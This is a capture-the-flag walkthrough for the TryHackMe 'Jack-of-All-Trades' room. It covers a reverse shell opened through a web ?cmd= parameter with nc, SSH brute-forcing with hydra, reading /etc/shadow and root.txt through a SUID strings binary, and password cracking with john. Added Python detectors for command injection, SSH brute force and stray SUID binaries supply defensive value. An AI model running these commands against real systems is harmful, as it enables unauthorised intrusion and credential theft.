Jack-of-All-Trades
Room Link: https://tryhackme.com/room/jackofalltrades
Initial Scan
For some reason the services are swapped: port 22 serves the HTTP site and port 80 runs SSH.
Kali
nmap -A $VICTIM

Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/22 - HTTP
gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Had to add the port override in Firefox to view the site on port 22 (Firefox blocks port 22 by default).

There is a stegosaurus picture on the home page, which hints that something is hidden in one of the pictures. Eventually we find the jackinthebox username and password embedded in one of them.
Kali
steghide extract -sf stego.jpg
Password: u?WtKSraq
steghide extract -sf header.jpg
Password: u?WtKSraq
If you run a command like this the page executes it but does not render the output; you have to view the page source to see the result.
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami

Kali
nc -lvnp 1337
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337

Upgrade to a proper interactive TTY (tab completion, job control):
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
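From the defender's side, the ?cmd= requests above leave a clear trail in the web server's access log. This is an added example, not part of the original writeup: it parses Apache/nginx combined-format lines, percent-decodes the query string and flags any request where a command-style parameter (cmd, exec, command, c) carries shell tokens. The log lines, the parameter list and the token list are constructed assumptions for the demo.

```python
# Added example (not from the original writeup): flag command-injection
# attempts like the ?cmd= requests above in a web server access log.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
10.10.154.80 - - [12/May/2024:10:01:02 +0000] "GET /nnxhweOV/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.154.80 - - [12/May/2024:10:01:09 +0000] "GET /nnxhweOV/index.php?cmd=whoami HTTP/1.1" 200 20 "-" "Mozilla/5.0"
10.10.154.80 - - [12/May/2024:10:01:31 +0000] "GET /nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.154.81 - - [12/May/2024:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Parameter names commonly abused for OS command execution (assumed list), and
# tokens that indicate a shell command rather than an ordinary value.
SUSPECT_PARAMS = {"cmd", "exec", "command", "c"}
SHELL_TOKENS = re.compile(
    r'(?:^|[\s;|&`$])(?:nc|ncat|sh|bash|dash|python\d?|perl|php|curl|wget|whoami|id|cat)\b'
    r'|[;|&`]|\$\(|/bin/|/dev/tcp'
)

def analyze_request(line):
    """Return a finding dict if the log line looks like command injection, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    params = parse_qs(query, keep_blank_values=True)  # parse_qs percent-decodes the values
    for name, values in params.items():
        if name.lower() not in SUSPECT_PARAMS:
            continue
        for value in values:
            if SHELL_TOKENS.search(value):
                return {
                    "src_ip": m.group("ip"),
                    "timestamp": m.group("ts"),
                    "param": name,
                    "decoded_value": value,
                    "status": int(m.group("status")),
                }
    return None

def scan_log(text):
    """Run analyze_request over every line and collect the findings in log order."""
    return [f for f in (analyze_request(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['timestamp']} {finding['src_ip']} "
              f"{finding['param']}={finding['decoded_value']!r}")
```

Decoding before matching matters: the reverse-shell request only reveals nc and sh once the %20 sequences are turned back into spaces. On the sample input the first and fourth lines pass and the two cmd= lines are reported.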
In the home directory there is a password list; it's small enough that I copied and pasted it into a file on Kali.

Kali
hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh

Kali
ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@
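The hydra run above is loud on the target: sshd writes one "Failed password" line per guess to auth.log, and it logs the same way whichever port it listens on, so moving SSH to port 80 hides nothing. This is an added example, not from the original writeup: it parses sshd entries, flags a source IP once it reaches a threshold of failures inside a short window, and marks the alert as compromised if an "Accepted password" from that IP follows. The log lines, the threshold and the window are constructed assumptions.

```python
# Added example (not from the original writeup): detect an SSH password-guessing
# burst from sshd entries in auth.log, including a success that follows the burst.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not real data).
SAMPLE_AUTH_LOG = """\
May 12 10:05:01 jack sshd[1201]: Failed password for jack from 10.10.154.80 port 51234 ssh2
May 12 10:05:01 jack sshd[1203]: Failed password for jack from 10.10.154.80 port 51236 ssh2
May 12 10:05:02 jack sshd[1205]: Failed password for jack from 10.10.154.80 port 51238 ssh2
May 12 10:05:02 jack sshd[1207]: Failed password for jack from 10.10.154.80 port 51240 ssh2
May 12 10:05:03 jack sshd[1209]: Failed password for jack from 10.10.154.80 port 51242 ssh2
May 12 10:05:04 jack sshd[1211]: Accepted password for jack from 10.10.154.80 port 51244 ssh2
May 12 10:30:00 jack sshd[1300]: Failed password for jack from 10.10.20.5 port 40000 ssh2
May 12 10:31:00 jack sshd[1302]: Accepted password for jack from 10.10.20.5 port 40002 ssh2
"""

SSHD_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+'
)

def parse_sshd(text, year=2024):
    """Yield (timestamp, result, user, ip); syslog lines carry no year, so one is assumed."""
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            yield ts, m.group("result"), m.group("user"), m.group("ip")

def detect_bruteforce(text, threshold=4, window_seconds=60):
    """Alert on a source IP once it reaches `threshold` failures inside `window_seconds`
    (assumed values); mark the alert compromised if a later login from that IP succeeds."""
    recent_failures = defaultdict(list)   # ip -> failure timestamps still inside the window
    alerts = {}
    for ts, result, user, ip in parse_sshd(text):
        if result == "Failed":
            recent_failures[ip] = [
                t for t in recent_failures[ip] if (ts - t).total_seconds() <= window_seconds
            ] + [ts]
            if ip in alerts:
                alerts[ip]["failures"] += 1
            elif len(recent_failures[ip]) >= threshold:
                alerts[ip] = {
                    "user": user,
                    "first_seen": recent_failures[ip][0],
                    "failures": len(recent_failures[ip]),
                    "compromised": False,
                }
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["compromised"] = True
    return alerts

if __name__ == "__main__":
    for ip, a in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        state = "COMPROMISED" if a["compromised"] else "attempted"
        print(f"{ip}: {a['failures']} failures against {a['user']} from {a['first_seen']} ({state})")
```

The "success after a burst" flag is the part worth acting on: a lone burst of failures is noise, but a burst followed by an Accepted login from the same address is the pattern the walkthrough above produces and the one that warrants resetting the account and reviewing what that session did.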


PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
cd /tmp
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
strings has the SUID bit set, which means we can run it against files we normally wouldn't be able to read. I tried cracking root's password with it but that was taking too long.
Victim
find / -perm -u=s -type f 2> /dev/null
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwd
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
I just ended up using strings to read root.txt directly.
Victim
/usr/bin/strings /root/root.txt
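The root of this privilege escalation is a setuid bit on a binary that should never carry one. An added example, not part of the original writeup, that a defender can use to catch it: it walks a tree for regular files with the setuid bit (the same condition as the find command above, without following symlinks) and reports any that are not on an expected list. The baseline list is a constructed, illustrative one, not an authoritative inventory, and the demo tree is built in a temporary directory so the script runs offline.

```python
# Added example (not from the original writeup): audit a filesystem tree for
# setuid binaries and flag any that are not on an expected list, so that a
# stray "strings" with the SUID bit shows up in a review.
import os
import stat
import tempfile

# Setuid binaries a stock Debian/Ubuntu install is expected to carry.
# Constructed, illustrative baseline (assumption); tune it per build.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount",
}

def find_suid(root):
    """Return sorted paths of regular files under `root` with the setuid bit set,
    mirroring `find / -perm -u=s -type f` and not following symlinks."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry, same as find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)

def audit_suid(root, expected=EXPECTED_SUID, prefix=""):
    """Return the setuid files under `root` that are not in `expected`.
    `prefix` lets a staged tree (a mounted image, or the demo directory below)
    be compared against real paths: '<prefix>/usr/bin/passwd' -> '/usr/bin/passwd'."""
    unexpected = []
    for path in find_suid(root):
        logical = path[len(prefix):] if prefix and path.startswith(prefix) else path
        if logical not in expected:
            unexpected.append(logical)
    return unexpected

def build_demo_tree():
    """Create a throwaway tree with one expected and one unexpected setuid file (constructed data)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("strings", 0o4755), ("ls", 0o755)):
        p = os.path.join(bindir, name)
        with open(p, "wb") as fh:
            fh.write(b"#!/bin/sh\n")  # placeholder contents; only the mode matters here
        os.chmod(p, mode)
    return root

if __name__ == "__main__":
    demo_root = build_demo_tree()
    for path in audit_suid(demo_root, prefix=demo_root):
        print("unexpected setuid binary:", path)
```

Run against the real root (`audit_suid("/")`) the same function gives the list to investigate; anything outside the baseline, and in particular a general-purpose file reader like strings, is a candidate for `chmod u-s` and a look at how the bit got there.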